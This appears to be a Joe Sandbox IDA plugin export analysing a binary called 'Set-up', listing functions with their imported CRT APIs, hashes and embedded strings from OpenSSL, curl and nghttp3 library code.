Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: strlen$feoffgetsmemcmpmemcpy
String ID: %256s "%64[^"]"$hsts.c$unlimited
API String ID: 288886899-2895786126
Opcode ID: 1e7b72e3e86f8ee70521cef731fde2bf55ddfe0d03342e0b3f0974fd887fe622
Instruction ID: 8e063b9563e17f89921324758c7e08eb21980bc33422455f85ea4ad4183a3e80
Opcode Fuzzy Hash: 1e7b72e3e86f8ee70521cef731fde2bf55ddfe0d03342e0b3f0974fd887fe622
Instruction Fuzzy Hash: 89511771D443027FFB109B349C46EAB7EE8BF85705F140828FD49A6282F631DA85C693

Function 00708240 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 63stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000001,00709265,?,00000400,00000000,?), ref: 00708254
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00709265,?), ref: 00708264
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00709265,?,?,?,?,?,?,00709265,?,00000400,00000000,?), ref: 007082C7

Strings

crypto/pem/pem_lib.c, xrefs: 007082A8
Enter PEM pass phrase:, xrefs: 00708279, 0070828C
PEM_def_callback, xrefs: 007082A1

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: memcpymemsetstrlen
String ID: Enter PEM pass phrase:$PEM_def_callback$crypto/pem/pem_lib.c
API String ID: 160209724-3271887637
Opcode ID: 1f4d524bea342dc0ae600a8df5a1ccfab7c9cc9651812a963210df38bd02cfb7
Instruction ID: 2860c4de277cfa097978f4aebf63910d2221c61b2c4ec2796bc32863523707d6
Opcode Fuzzy Hash: 1f4d524bea342dc0ae600a8df5a1ccfab7c9cc9651812a963210df38bd02cfb7
Instruction Fuzzy Hash: 4101D2A6B043116BE95076686C82F6B26DDDB86B64F080139FE04E21C2EA51DD1592F3

Function 005B8920 Relevance: 9.0, APIs: 6, Instructions: 45COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 005B895D
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 005B8991
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 005B899A
_write.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 005B89AB
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 005B89B4
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 005B89B9

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: __acrt_iob_func_fileno_writeabortfreemalloc
String ID:
API String ID: 1064163434-0
Opcode ID: 3b5f34a48585cbd5cfba50210aacbff5512f22dec81244edfce1ab1b497462df
Instruction ID: 0b9abbc618e52b2988de5b96cdbb30e862a7e7f9a5e9c2dd2b3c3f4124b179bd
Opcode Fuzzy Hash: 3b5f34a48585cbd5cfba50210aacbff5512f22dec81244edfce1ab1b497462df
Instruction Fuzzy Hash: 2D119EB44093119BD740AF2A858862EFBE8BF89740F45981EF9C883341EB749940CF93

Function 00898920 Relevance: 9.0, APIs: 6, Instructions: 30COMMON

Download Yara Rule

APIs

_initialize_narrow_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00898928
_configure_narrow_argv.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,0051115A), ref: 0089893D
__p___argc.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,0051115A), ref: 00898942
__p___argv.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,0051115A), ref: 0089894F
__p__environ.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,0051115A), ref: 0089895C
_set_new_mode.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,0051115A), ref: 00898972

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: __p___argc__p___argv__p__environ_configure_narrow_argv_initialize_narrow_environment_set_new_mode
String ID:
API String ID: 3593706420-0
Opcode ID: 1efc63e94736ec762dde092320e3d59adf545601741b22b2780315d7096a2df3
Instruction ID: 1c07dccd3461122d172363cff379a905af91d6e3e5b01caefb0043d7ee675a41
Opcode Fuzzy Hash: 1efc63e94736ec762dde092320e3d59adf545601741b22b2780315d7096a2df3
Instruction Fuzzy Hash: 05F09274614742CFCB00BF6CC48181A77E0FF9A318F544AA8F5909B362DA3599419F92

Function 005745C0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 259COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000000,?,?,00545B6B,00000017,?,?), ref: 00574612
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789abcdef,?,00000011), ref: 00574660

Strings

0123456789ABCDEF, xrefs: 00574683, 00574694
0123456789abcdef, xrefs: 0057465B, 0057466C

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: _errnomemchr
String ID: 0123456789ABCDEF$0123456789abcdef
API String ID: 4119152314-885041942
Opcode ID: f2dc61189bd3ec66502167010313709baa35282eb22b0dcd80f54321cfd5b032
Instruction ID: 33cb1b3f4ef8ae10d313d00efae40fe50dd5e96d06757dc06ab1c214914f5d50
Opcode Fuzzy Hash: f2dc61189bd3ec66502167010313709baa35282eb22b0dcd80f54321cfd5b032
Instruction Fuzzy Hash: D9910271A083458BD728DE2CE84026EBBD1FFD6314F19CA2DE9D987381DB319845AF42

Function 00562250 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0056225F
_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 005622CF

Strings

Hostname in DNS cache does not have needed family, zapped, xrefs: 005623EF, 005623FE
Hostname in DNS cache was stale, zapped, xrefs: 00562322
:%u, xrefs: 00562290, 00562363

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: _time64strlen
String ID: :%u$Hostname in DNS cache does not have needed family, zapped$Hostname in DNS cache was stale, zapped
API String ID: 3014104814-1335658360
Opcode ID: ae60dd3299af95159653b22dba877007d40f60474d81cd62966d22bbb09daf4a
Instruction ID: 0faf9bf3ad031e0e5f763265c663dcec2dd88a922b5bae4b7d8431b940915cf9
Opcode Fuzzy Hash: ae60dd3299af95159653b22dba877007d40f60474d81cd62966d22bbb09daf4a
Instruction Fuzzy Hash: 4341F371A00B055BDB249A29DC85B7BBAD5FFC4314F08483CE99A8B382EA35AC55C751

Function 005C06F0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 117COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ctx->next_absidx > absidx,nghttp3_qpack.c,000008B6,?,?,005C0307,?), ref: 005C07AE
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ctx->next_absidx - absidx - 1 < nghttp3_ringbuf_len(&ctx->dtable),nghttp3_qpack.c,000008B7,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 005C07C3

Strings

ctx->next_absidx > absidx, xrefs: 005C07A9
ctx->next_absidx - absidx - 1 < nghttp3_ringbuf_len(&ctx->dtable), xrefs: 005C07BE
nghttp3_qpack.c, xrefs: 005C07A4, 005C07B9

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: _assert
String ID: ctx->next_absidx - absidx - 1 < nghttp3_ringbuf_len(&ctx->dtable)$ctx->next_absidx > absidx$nghttp3_qpack.c
API String ID: 1222420520-241347991
Opcode ID: d763f4b45aa48498248d0dc1e368b1e40f1aedf6cecaa0514b7144d46c68a54c
Instruction ID: da1f303b82857f3b29401422dcc76e6882ed66c237192323dd9e998e1c9999c7
Opcode Fuzzy Hash: d763f4b45aa48498248d0dc1e368b1e40f1aedf6cecaa0514b7144d46c68a54c
Instruction Fuzzy Hash: 6D31E079700600AFD310AA68DC85F6BB7E5FF89714F04956CF98A87282EA20F85587E1

Function 00894610 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 116fileCOMMON

Download Yara Rule

APIs

_stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00525FB6,?), ref: 00894645
_stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(../list/public_suffix_list.dat,?), ref: 00894698
fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00BFE1F8), ref: 00894744
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00894762

Strings

../list/public_suffix_list.dat, xrefs: 00894693, 008946B9, 008946F5

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: _stat64$fclosefopen
String ID: ../list/public_suffix_list.dat
API String ID: 1085753941-141370353
Opcode ID: 17ef1e8c419a736eb131e7868ca05d67995181f40c512137d06a12d713af3db0
Instruction ID: f8cb576aa6dad48bca79f27c47d2bdc6bf6ed0d0111e47ea8e95c252df698680
Opcode Fuzzy Hash: 17ef1e8c419a736eb131e7868ca05d67995181f40c512137d06a12d713af3db0
Instruction Fuzzy Hash: 1E4190B29083499BDB00EF58D440B1AB7E9FB85744F19582CE985D7350E770ED49CB93

Function 00582680 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 98COMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00582771

Strings

gfff, xrefs: 005826EE
set timeouts for state %d; Total % lld, retry %d maxtry %d, xrefs: 00582761
netascii, xrefs: 00582680
Connection time-out, xrefs: 005826CD

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: _time64
String ID: Connection time-out$gfff$netascii$set timeouts for state %d; Total % lld, retry %d maxtry %d
API String ID: 1670930206-2395985473
Opcode ID: 72983ed8ae44c5c001454dcb99624230ab691b66d4c0735714e4bd805b6006ad
Instruction ID: 0d12ae6947c8b00d0fbce76778fc596ec03c06ee31b89dde48274440080f37c6
Opcode Fuzzy Hash: 72983ed8ae44c5c001454dcb99624230ab691b66d4c0735714e4bd805b6006ad
Instruction Fuzzy Hash: 0321ECB17003005BEB286A2A9C06B277DDAFBC4304F18853DF949DB2D6F975D8118751

Function 005B6010 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(veccnt > 0,nghttp3_stream.c,0000033D), ref: 005B6119
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(0 == offset,nghttp3_stream.c,00000349), ref: 005B612E

Strings

veccnt > 0, xrefs: 005B6114
0 == offset, xrefs: 005B6129
nghttp3_stream.c, xrefs: 005B610F, 005B6124

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: _assert
String ID: 0 == offset$nghttp3_stream.c$veccnt > 0
API String ID: 1222420520-3888743547
Opcode ID: 8b616473fea15bb7f2d5976691e313ebf4f9dbea29e224676c2ff48d0584bfcc
Instruction ID: 238185cbfb585a4584e84cd0bf4348d05b6e8ecdf813ec56852081bb200a93a5
Opcode Fuzzy Hash: 8b616473fea15bb7f2d5976691e313ebf4f9dbea29e224676c2ff48d0584bfcc
Instruction Fuzzy Hash: 3431F9755043058FC704EF19D88AABABBE4FF88318F0545BCE9895B351D671BD41CB91

Function 00514810 Relevance: 8.0, APIs: 3, Strings: 2, Instructions: 484COMMON

Download Yara Rule

Strings

formdata.c, xrefs: 0051481F, 00514C8D, 00514DEB, 00514F36, 00514FF3, 00515081, 005150AB, 005150E6, 00515116, 00515161, 0051518B, 005151C6, 005151F6
application/octet-stream, xrefs: 00514DE3

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID:
String ID: application/octet-stream$formdata.c
API String ID: 0-1216067158
Opcode ID: 0b900434b23142c444414c87ea5848a79cc8f7a1bb26bddab997b566ee6cf453
Instruction ID: 3c07bdcd632b75d03b19d33d2bc1de791d991f6057a914d692775ab2e17ef778
Opcode Fuzzy Hash: 0b900434b23142c444414c87ea5848a79cc8f7a1bb26bddab997b566ee6cf453
Instruction Fuzzy Hash: 8302A3B0A08B40DBF7259F14D9447A6BFE1BB95304F18582CD8CA4B792E775E8C5CB82

Function 007B46B0 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 324stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 007B46DD

Strings

ASN1_mbstring_ncopy, xrefs: 007B4797, 007B47BC, 007B47E1, 007B4806, 007B4845, 007B4884, 007B492C, 007B49DE, 007B4A35
crypto/asn1/a_mbstr.c, xrefs: 007B479E, 007B47C3, 007B47E8, 007B480D, 007B484C, 007B488B, 007B4933, 007B4A3F, 007B4A9D
maxsize=%ld, xrefs: 007B4899
minsize=%ld, xrefs: 007B485A

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: strlen
String ID: ASN1_mbstring_ncopy$crypto/asn1/a_mbstr.c$maxsize=%ld$minsize=%ld
API String ID: 39653677-2338284442
Opcode ID: 028d56b4444559c7744ed826bec3a34a07556b21a835c70bd903c8188da8fe07
Instruction ID: cfa3bce9f8fb10f384babdcdf387021d394b8e582ca921bb60c1a3af521d2881
Opcode Fuzzy Hash: 028d56b4444559c7744ed826bec3a34a07556b21a835c70bd903c8188da8fe07
Instruction Fuzzy Hash: 69A12C71B4C3016BD7206A149C02FAF77D1EBA1B14F04492CFA599B3C3E6B9EC00869B

Function 00702530 Relevance: 7.8, APIs: 3, Strings: 2, Instructions: 306COMMON

Download Yara Rule

Strings

crypto/objects/obj_dat.c, xrefs: 00702810
.%lu, xrefs: 00702761

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
